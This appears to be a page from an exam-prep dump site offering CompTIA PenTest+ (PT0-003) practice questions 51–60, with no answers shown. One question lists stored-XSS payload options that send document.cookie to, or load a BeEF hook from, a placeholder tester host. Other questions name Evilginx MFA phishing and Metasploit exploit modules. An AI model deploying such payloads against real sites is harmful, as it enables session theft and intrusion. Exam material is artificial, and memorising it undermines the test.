Summer Sale Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

CompTIA PenTest+ Exam

Last Update 10 hours ago Total Questions : 336

The CompTIA PenTest+ Exam content is now fully updated, with all current exam questions added 10 hours ago. Deciding to include PT0-003 practice exam questions in your study plan goes far beyond basic test preparation.

You'll find that our PT0-003 exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these PT0-003 sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any CompTIA PenTest+ Exam practice test comfortably within the allotted time.

Question # 51

A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings, and high-level statements. Which of the following sections of the report would most likely contain this information?

A.

Quality control

B.

Methodology

C.

Executive summary

D.

Risk scoring

Question # 52

During a penetration test, a tester has confirmed stored XSS within a comment form on a site. Which of the following payloads is required to exploit the vulnerability and provide a reverse shell against user browsers?

A.

Use Evilginx and insert payload < img src= " http:// < tester-IP > /?f ' document.cookie+ ' "

B.

Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >

C.

Use Netcat listener and insert payload < iframe src=http:// < tester-IP > /../../bin/bash >

D.

Use Metasploit post/firefox/gather/xss and insert payload < img src= " http:// < tester-IP > "

Question # 53

A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?

A.

route.exe print

B.

netstat.exe -ntp

C.

net.exe commands

D.

strings.exe -a

Question # 54

A penetration tester attempts unauthorized entry to the company ' s server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

A.

Plug spinner

B.

Bypassing

C.

Decoding

D.

Raking

Question # 55

A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

A.

Configure and register a service.

B.

Install and run remote desktop software.

C.

Set up a script to be run when users log in.

D.

Perform a kerberoasting attack on the host.

Question # 56

During an engagement, a penetration tester decides to use social engineering to capture MFA. Which of the following tools or configuration commands should the tester use?

A.

Evilginx

B.

use phish/domains/o365set SOURCE portal.office.comrun

C.

wget portal.office.comexport MFA= ' < myphishdomain > '

D.

Recon-ng

Question # 57

During an assessment, a penetration tester obtains access to a Microsoft SQL server using sqlmap and runs the following command:

sql > xp_cmdshell whoami /all

Which of the following is the tester trying to do?

A.

List database tables

B.

Show logged-in database users

C.

Enumerate privileges

D.

Display available SQL commands

Question # 58

A penetration tester completes a scan and sees the following Nmap output on a host:

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open snmp

445/tcp open microsoft-ds

3389/tcp open ms-wbt-server

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7::sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

A.

exploit/windows/smb/psexec

B.

exploit/windows/smb/ms08_067_netapi

C.

exploit/windows/smb/ms17_010_eternalblue

D.

auxiliary/scanner/snmp/snmp_login

Question # 59

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Question # 60

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

A.

OS fingerprinting

B.

Attack path mapping

C.

Service discovery

D.

User enumeration

Go to page: